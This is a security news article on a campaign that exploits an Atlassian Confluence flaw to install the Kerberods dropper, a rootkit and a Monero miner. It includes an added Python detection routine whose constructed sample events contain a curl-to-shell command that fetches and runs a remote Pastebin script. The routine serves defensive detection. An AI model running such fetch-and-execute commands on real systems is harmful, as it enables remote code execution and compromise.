Hackers attack Confluence Servers, hijack power for cryptocurrency mining. Illicit Monero mining is the goal. According to Trend Micro, attackers are exploiting CVE-2019-3396, a bug in the Widget Connector macro of Atlassian Confluence Server that permits path traversal and remote code execution via server-side injection.

Atlassian released a patch on March 20, 2019, to resolve the security flaw alongside an accompanying fix for CVE-2019-3395, a WebDAV endpoint issue which permits attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

However, it seems that unpatched Confluence systems are being widely exploited in the new campaign, which focuses on mining Monero.

The researchers, Augusto Remillano II and Robert Malagad, say that CVE-2019-3396 was previously used to drop the GandCrab ransomware, and now the bug is also being used to drop rootkits and cryptocurrency mining malware onto vulnerable systems.

The infection chain begins with a remote command which is sent to fetch a shell script from Pastebin. This script contains kill process capabilities and is able to download and execute a second shell script, again from a Pastebin source, eventually leading to a third Pastebin shell script download.

A Trojan dropper, known as Kerberods, is then fetched and installed. This malware drops the “khugepageds” cryptocurrency miner — flagged as Coinminer.Linux.MALXMR.UWEJI — alongside the rootkit component.

The rootkit, which is designed to mask the cryptocurrency miner’s activities, is dropped as source code that is then compiled with GCC.

Kerberods can also propagate over networks via SSH, exploiting CVE-2019-1003001 and CVE-2019-1003000, Jenkins automation server security flaws that can result in arbitrary code execution.

Both Kerberods and its rootkit use custom packers to make analysis more challenging. The rootkit is not only able to hide the mining process but is also able to forge the infected machine’s CPU usage — in turn, concealing one of the main indicators of a cryptocurrency mining malware operation.
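The chain described above leaves a distinctive process-tree footprint on the Confluence host: a shell spawned by the application's JVM pulling scripts from Pastebin, a compiler run to build the rootkit from source, and a miner whose name ("khugepageds") imitates the legitimate Linux kernel thread "khugepaged". The following detection routine is an added example written for this article; it is not code from the article, from Trend Micro, or from any product. It runs over constructed process-execution events, and the field names (pid, ppid, comm, cmdline, exe) are an assumption to be mapped onto whatever your auditd or EDR pipeline actually emits.

```python
"""Detection heuristics for the Confluence-to-coinminer chain (added example).

The events below are CONSTRUCTED sample telemetry, not real captures. Field
names are an assumption; adapt them to your own process-audit source.
Real kernel threads have no executable on disk, so "exe" is "" for them.
"""
import re

SAMPLE_EVENTS = [  # constructed
    {"pid": 100, "ppid": 1, "comm": "java",
     "cmdline": "/opt/atlassian/confluence/jre/bin/java -Dconfluence.home=/var/atlassian/confluence",
     "exe": "/opt/atlassian/confluence/jre/bin/java"},
    {"pid": 101, "ppid": 100, "comm": "sh",
     "cmdline": "sh -c curl -fsSL https://pastebin.com/raw/EXAMPLE_PASTE_ID | sh",
     "exe": "/bin/sh"},
    {"pid": 102, "ppid": 101, "comm": "curl",
     "cmdline": "curl -fsSL https://pastebin.com/raw/EXAMPLE_PASTE_ID",
     "exe": "/usr/bin/curl"},
    {"pid": 103, "ppid": 101, "comm": "gcc",
     "cmdline": "gcc -o /tmp/EXAMPLE_OUT /tmp/EXAMPLE_SRC.c",
     "exe": "/usr/bin/gcc"},
    {"pid": 104, "ppid": 101, "comm": "khugepageds",
     "cmdline": "/tmp/khugepageds", "exe": "/tmp/khugepageds"},
    {"pid": 37, "ppid": 2, "comm": "khugepaged", "cmdline": "", "exe": ""},  # genuine kernel thread
    {"pid": 200, "ppid": 1, "comm": "sshd", "cmdline": "/usr/sbin/sshd -D", "exe": "/usr/sbin/sshd"},
]

# Paste-site pattern named in the article; extend with other paste hosts as needed.
PASTE_HOST = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.IGNORECASE)
# GCC is what the article names; cc/clang are an assumption covering the same behaviour.
COMPILERS = {"gcc", "cc", "clang"}
# Genuine Linux kernel thread names that a user-space binary should never carry.
KERNEL_THREADS = {"khugepaged", "kswapd0", "kthreadd", "kcompactd0", "ksoftirqd/0"}


def lineage(events, pid):
    """Return [comm of pid, comm of its parent, ...] walking up the process table."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["comm"])
        pid = by_pid[pid]["ppid"]
    return chain


def descends_from(events, pid, ancestor_comm):
    """True if some ancestor (not the process itself) has the given comm."""
    return ancestor_comm in lineage(events, pid)[1:]


def looks_like_kernel_thread(comm):
    """Exact kernel-thread name, or one character away from one (khugepageds -> khugepaged)."""
    if comm in KERNEL_THREADS:
        return True
    return any(comm[:i] + comm[i + 1:] in KERNEL_THREADS for i in range(len(comm)))


def detect(events, app_comm="java"):
    """Return (pid, reason) findings for the three behaviours described in the article."""
    findings = []
    for e in events:
        if PASTE_HOST.search(e["cmdline"]) and descends_from(events, e["pid"], app_comm):
            findings.append((e["pid"], "paste-site fetch under the Confluence JVM process tree"))
        if e["comm"] in COMPILERS and descends_from(events, e["pid"], app_comm):
            findings.append((e["pid"], "compiler spawned under the Confluence JVM process tree"))
        # A kernel thread has no on-disk executable; a binary wearing its name is suspect.
        if e["exe"] and looks_like_kernel_thread(e["comm"]):
            findings.append((e["pid"], "user-space binary named like a kernel thread"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

Because the rootkit in this campaign can falsify what the compromised host reports about its own CPU usage and process list, host-side telemetry like this should be corroborated from a vantage the rootkit cannot touch: hypervisor or cloud CPU metrics, and egress flow logs showing sustained connections to mining pools.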

Given the active exploit of Confluence Servers in the wild, it is recommended that admins apply Atlassian’s patches without delay.



About the Author: Bernard Aybout

In the land of bytes and bits, a father of three sits, With a heart for tech and coding kits, in IT he never quits. At Magna's door, he took his stance, in Canada's wide expanse, At Karmax Heavy Stamping - Cosma's dance, he gave his career a chance. With a passion deep for teaching code, to the young minds he showed, The path where digital seeds are sowed, in critical thinking mode. But alas, not all was bright and fair, at Magna's lair, oh despair, Harassment, intimidation, a chilling air, made the workplace hard to bear. Management's maze and morale's dip, made our hero's spirit flip, In a demoralizing grip, his well-being began to slip. So he bid adieu to Magna's scene, from the division not so serene, Yet in tech, his interest keen, continues to inspire and convene.